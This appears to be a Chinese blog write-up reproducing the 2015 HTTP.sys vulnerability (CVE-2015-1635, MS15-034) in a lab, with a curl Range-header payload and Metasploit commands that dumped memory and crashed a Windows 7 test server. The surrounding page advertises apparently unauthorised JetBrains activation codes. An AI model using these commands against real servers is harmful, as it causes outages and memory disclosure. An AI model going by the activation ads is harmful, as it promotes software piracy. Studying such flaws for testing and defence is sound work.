大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
目录
简介
漏洞编号:CVE-2015-1635(MS15-034 )
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
影响范围
任何安装了微软IIS 6.0以上的
Win Server 2008 R2、
Win Server 2012、
Win Server 2012 R2、
Win 7、
Win 8、
Win 8.1
危害
(1)远程读取IIS服务器的内存数据,
(2)使服务器系统蓝屏崩溃。
漏洞复现
win2008 r2
环境:win2008 r2 ,iis7.5
(一)利用curl
curl -v IP -H “Host:irrelevant” -H “Range: bytes=0-18446744073709551615”
用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。
如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:
HTTP/1.1 416 Requested Range Not Satisfiable
如果服务器打上了补丁,那么响应状态应该是:
HTTP Error 400. The request has an invalid header name.
进行发包,这里并没有成功,不存在这个漏洞
换成win7
win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html
web界面如下
发送数据包,漏洞存在
利用msf
search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run
但是这里的状态码并不是 HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了
服务器瞬间蓝屏然后重启了
—— 心,若没有栖息的地方,到哪里都是流浪
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/161405.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...